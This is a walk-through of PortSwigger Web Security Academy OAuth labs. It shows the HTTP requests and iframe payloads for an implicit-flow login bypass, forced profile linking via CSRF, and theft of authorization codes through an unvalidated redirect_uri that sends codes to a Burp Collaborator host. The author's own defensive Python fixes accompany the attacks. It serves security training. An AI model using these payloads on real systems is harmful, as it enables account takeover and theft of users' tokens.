Walk-through of the OAuth authentication labs on PortSwigger Web Security Academy.
- Apprentice – Authentication bypass via OAuth implicit flow
- Practitioner – SSRF via OpenID dynamic client registration
- Practitioner – Forced OAuth profile linking
- Practitioner – OAuth account hijacking via redirect_uri
- Practitioner – Stealing OAuth access tokens via an open redirect
- Expert – Stealing OAuth access tokens via a proxy page
Apprentice – Authentication bypass via OAuth implicit flow
To solve the lab, log in to Carlos’s account. His email address is carlos@carlos-montoya.net.
- Click on My account.
- You are redirected to the OAuth server, which displays a Sign-in form. Enter the credentials wiener/peter and click Sign-in.
WeLikeToBlog is requesting access to:
Profile
Email
Click on Continue.
Inspect the requests in the proxy history. The following request is interesting: the client application sends the access token to its own /authenticate endpoint together with the user's email address and username, so the token is effectively used as a password while the identity comes from the request body.
POST /authenticate HTTP/1.1
Host: <LAB ID>.web-security-academy.net
...
{"email":"wiener@hotdog.com","username":"wiener","token":"c_JLJvXGtqQ3g76r9A7BzPKhHoFZmY_v88Osju8q-NH"}
Send the request to the Repeater module. Change the email address and username to Carlos's and send the request.
POST /authenticate HTTP/1.1
Host: <LAB ID>.web-security-academy.net
...
{"email":"carlos@carlos-montoya.net","username":"carlos","token":"c_JLJvXGtqQ3g76r9A7BzPKhHoFZmY_v88Osju8q-NH"}
HTTP/1.1 302 Found
Location: /
Set-Cookie: session=ZIoPbpvKRibZhVULkRWzQh0ak7zUm4af; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Change the value of the session cookie in the browser to this new value to be logged in as carlos.
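As a defender's counterpart to the bypass above, here is an added example (my own code, not the lab's or PortSwigger's) of how the client's /authenticate handler should behave: the identity is taken from the provider's /userinfo answer for the token, never from the request body. The userinfo lookup is a constructed stub keyed on the token shown in the request above.

```python
import json

# Constructed stand-in for the provider's /userinfo endpoint: maps the access
# token shown in the lab above to the identity the provider vouches for.
PROVIDER_USERINFO = {
    "c_JLJvXGtqQ3g76r9A7BzPKhHoFZmY_v88Osju8q-NH": {
        "email": "wiener@hotdog.com",
        "username": "wiener",
    },
}


def lookup_userinfo(token):
    """Hypothetical server-to-server call to the provider's /userinfo endpoint
    (stubbed offline). Returns None for an unknown or expired token."""
    return PROVIDER_USERINFO.get(token)


def authenticate_insecure(body):
    """The behaviour the lab exploits: the token is only checked to exist, and
    the client-supplied email decides which account the session is created for."""
    data = json.loads(body)
    if lookup_userinfo(data.get("token", "")) is None:
        return None
    return data["email"]  # attacker-controlled


def authenticate_secure(body):
    """Hardened handler: the identity is whatever the provider says the token
    belongs to. A body that names a different user is rejected outright (and is
    worth logging, since a legitimate client never sends a mismatching email)."""
    data = json.loads(body)
    info = lookup_userinfo(data.get("token", ""))
    if info is None:
        return None  # unknown, expired or forged token
    if data.get("email") != info["email"]:
        return None  # body disagrees with the provider: possible tampering
    return info["email"]  # create the session for this identity only
```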
Practitioner – SSRF via OpenID dynamic client registration
Practitioner – Forced OAuth profile linking
This lab gives you the option to attach a social media profile to your account so that you can log in via OAuth instead of using the normal username and password. Due to the insecure implementation of the OAuth flow by the client application, an attacker can manipulate this functionality to obtain access to other users’ accounts. To solve the lab, use a CSRF attack to attach your own social media profile to the admin user’s account on the blog website, then access the admin panel and delete carlos. You can log in to your own accounts using the following credentials: Blog website account: wiener:peter, Social media profile: peter.wiener:hotdog
- Click on My Account.
- Enter credentials wiener:peter and click Log in. Do NOT use Login with social media.
POST /login HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<token>
[...]
csrf=<csrf-token>&username=wiener&password=peter
The response for the My account page contains a link to attach a social profile.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 3491
[...]
<p>Your social profile username is: </p>
<p><a href='https://oauth-<SOME ID>.oauth-server.net/auth?client_id=<CLIENT ID>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-linking&response_type=code&scope=openid%20profile%20email'>Attach a social profile</a></p>
Notice that the redirect_uri parameter points to https://<LAB ID>.web-security-academy.net/oauth-linking and that the request does NOT contain a state parameter to protect against CSRF.
- Click on Attach a social profile.
- Enter credentials peter.wiener:hotdog and click Sign in.
WeLikeToBlog is requesting access to:
Profile
Email
Click Continue.
You have successfully linked your social media account
- Click Continue.
- Click on Log out.
- Click on My account.
There is a button Login with social media.
<a class=button style='display: inline-block; background: rgb(77, 144, 254)' href='https://oauth-<SOME ID>.oauth-server.net/auth?client_id=<CLIENT ID>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-login&response_type=code&scope=openid%20profile%20email'>Login with social media</a>
- Click on Login with social media.
- Click Continue. You are automatically logged in.
- Turn on interception in Burp Suite (Proxy -> Intercept, click "Intercept is off" so that it reads "Intercept is on").
- Click on Attach a social profile.
- Forward all requests until you reach this one:
GET /oauth-linking?code=<CODE> HTTP/1.1
Host: <LAB ID>.web-security-academy.net
Cookie: session=<token>
[...]
Right-click on this request and select "Copy URL", then drop the request. This is important: the authorization code must not be consumed by your own session, so that it remains valid for the victim.
- Stop interception.
- Click on Log out.
Click on Go to exploit server and enter the payload below in the body. When the victim loads it, their browser sends the linking request with your code, using their own session cookie.
<iframe src="https://<LAB ID>.web-security-academy.net/oauth-linking?code=<CODE>"></iframe>
- Click on Deliver exploit to victim.
- Click on My Account and click on Login with social media.
You are now logged in as the administrator. Click on Admin panel and delete user carlos to solve the lab.
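The missing state parameter is what makes the linking request forgeable. The following added example (my own code, not the lab's; AUTH_SERVER, REDIRECT_URI and the client_id are placeholders) shows how a client binds the flow to the user's session with a state value and refuses callbacks that lack it or carry one issued to a different session.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholders standing in for the lab's OAuth server and client callback.
AUTH_SERVER = "https://oauth-SOME-ID.oauth-server.net/auth"
REDIRECT_URI = "https://LAB-ID.web-security-academy.net/oauth-linking"


def build_linking_url(session, client_id):
    """Start the linking flow: mint an unguessable state value, store it in the
    user's server-side session, and send it along to the authorization server."""
    session["oauth_state"] = secrets.token_urlsafe(32)
    query = {
        "client_id": client_id,
        "redirect_uri": REDIRECT_URI,
        "response_type": "code",
        "scope": "openid profile email",
        "state": session["oauth_state"],
    }
    return AUTH_SERVER + "?" + urlencode(query)


def handle_linking_callback(session, callback_url):
    """Handle GET /oauth-linking. Returns the authorization code to exchange, or
    None when the request must be refused. The stored state is consumed on first
    use so a callback cannot be replayed."""
    params = parse_qs(urlsplit(callback_url).query)
    expected = session.pop("oauth_state", None)
    received = params.get("state", [None])[0]
    if expected is None or received is None:
        # Either this session never started a linking flow, or the callback
        # carries no state at all (the shape of the forged request in the lab).
        return None
    if not hmac.compare_digest(expected, received):
        return None  # state issued to a different session: treat as CSRF
    return params.get("code", [None])[0]
```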
Practitioner – OAuth account hijacking via redirect_uri
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users’ accounts. To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user carlos. The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service. You can log in with your own social media account using the following credentials: wiener:peter.
- Click on My Account. You will be redirected to /social-login, which will redirect to the OAuth server.
- Enter credentials wiener:peter and click Sign-in.
POST /interaction/DVJvHBytwKxhRI5FjC3we/login HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _interaction=DVJvHBytwKxhRI5FjC3we
[...]
username=wiener&password=peter
- Click Continue to authorize access to your profile and email to WeLikeToBlog.
- Click Continue to complete login.
- Click on My account, then Log out.
- Click on My account. Click on Continue.
You are now automatically logged in without providing credentials, since you still have an active session with the OAuth service.
In the proxy history, find the most recent authorization request (GET /auth on the OAuth server) and send it to the Repeater module.
GET /auth?client_id=<client id>&redirect_uri=https://<LAB ID>.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _session=KPpuCth-CuTO4jj8q8uvw; _session.legacy=KPpuCth-CuTO4jj8q8uvw
[...]
HTTP/2 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR
Content-Type: text/html; charset=utf-8
Set-Cookie: _session=KPpuCth-CuTO4jj8q8uvw; path=/; expires=Thu, 10 Aug 2023 13:50:09 GMT; samesite=none; secure; httponly
Set-Cookie: _session.legacy=KPpuCth-CuTO4jj8q8uvw; path=/; expires=Thu, 10 Aug 2023 13:50:09 GMT; secure; httponly
Date: Thu, 27 Jul 2023 13:50:09 GMT
Keep-Alive: timeout=5
Content-Length: 289
Redirecting to <a href="https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR">https://<LAB ID>.web-security-academy.net/oauth-callback?code=6_V9Tx81tPeEyfrpRLpPRuGetySPJnDrEEYOXRrPoOR</a>.
The server redirects to whatever value is in the redirect_uri parameter, without validating it against the URI registered for the client. Replace the redirect_uri value with your Burp Collaborator URL.
GET /auth?client_id=xdwpxjbrrcoicybrsnpbi&redirect_uri=https://<BURP COLLABORATOR ID>.oastify.com&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-<OAUTH LAB ID>.oauth-server.net
Cookie: _session=KPpuCth-CuTO4jj8q8uvw; _session.legacy=KPpuCth-CuTO4jj8q8uvw
[...]
HTTP/2 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S
[...]
Redirecting to <a href="https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S">https://<BURP COLLABORATOR ID>.oastify.com?code=gEEsoz4tL5irQTKKtDhTTlutdf-G4C_SNyJ0kUxAe3S</a>.
In the Repeater module, send the request and follow the redirection. The OAuth server redirects to the Burp Collaborator URL, and Burp Collaborator receives an HTTP request carrying the authorization code.
GET /?code=g5_UOJbWLFD7-xa8hLLvuHQbuxi8v-T7baYyUJSENhk HTTP/2
Host: <BURP COLLABORATOR ID>.oastify.com
[...]
- Click on Go to exploit server.
- In the Body, enter the payload below.
- Click Store.
<iframe src="https://oauth-<OAUTH LAB ID>.oauth-server.net/auth?client_id=<client id>&redirect_uri=https://<BURP COLLABORATOR ID>.oastify.com&response_type=code&scope=openid%20profile%20email"></iframe>
Click on Deliver exploit to victim. Burp Collaborator receives a request from the administrator's browser, carrying a code issued for the admin's OAuth session.
GET /?code=s44ZV69C1TamWXDUpCXludTZvi9RlcRb7ybh8sx_EfI HTTP/1.1
Host: <BURP COLLABORATOR ID>.oastify.com
[...]
We get code “s44ZV69C1TamWXDUpCXludTZvi9RlcRb7ybh8sx_EfI”.
- Click on My account.
- Click on Log out.
Enter this URL in your browser:
https://<LAB ID>.web-security-academy.net/oauth-callback?code=<previously obtained code>
Click on Continue. You are now logged in as the administrator. Click on Admin panel and delete user carlos to solve the lab.
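The root cause on the provider side is that /auth accepts any redirect_uri. As an added example (my own code, not the lab's OAuth server; the registration record and the LAB-ID host are constructed placeholders, the client_id is the one from the request above), this is the exact-match check a provider should apply before issuing a code, rendering an error page instead of redirecting when validation fails.

```python
from urllib.parse import urlsplit

# Constructed registration record for the blog client. The client_id is the one
# seen in the lab's /auth request; the host is a placeholder for the lab ID.
REGISTERED_CLIENTS = {
    "xdwpxjbrrcoicybrsnpbi": {
        "redirect_uris": ["https://LAB-ID.web-security-academy.net/oauth-callback"],
    },
}


def redirect_uri_allowed(client_id, requested):
    """Exact-match validation of redirect_uri against the registered list.
    Prefix, suffix and substring comparisons are deliberately avoided."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None:
        return False
    parts = urlsplit(requested)
    if parts.scheme != "https" or parts.query or parts.fragment:
        return False  # only https, and no query/fragment smuggled into the URI
    return requested in client["redirect_uris"]


def authorize(client_id, redirect_uri, response_type, issue_code):
    """Decision logic for /auth once the user is authenticated. issue_code is a
    callable that mints a fresh single-use code for this user and client.
    Returns ("error", reason) to render an error page, or ("redirect", url).
    On an invalid redirect_uri the provider must not redirect at all
    (RFC 6749, section 3.1.2.4); that is what keeps the code from leaving the
    registered origin."""
    if not redirect_uri_allowed(client_id, redirect_uri):
        return ("error", "invalid_redirect_uri")
    if response_type != "code":
        return ("redirect", redirect_uri + "?error=unsupported_response_type")
    return ("redirect", redirect_uri + "?code=" + issue_code())
```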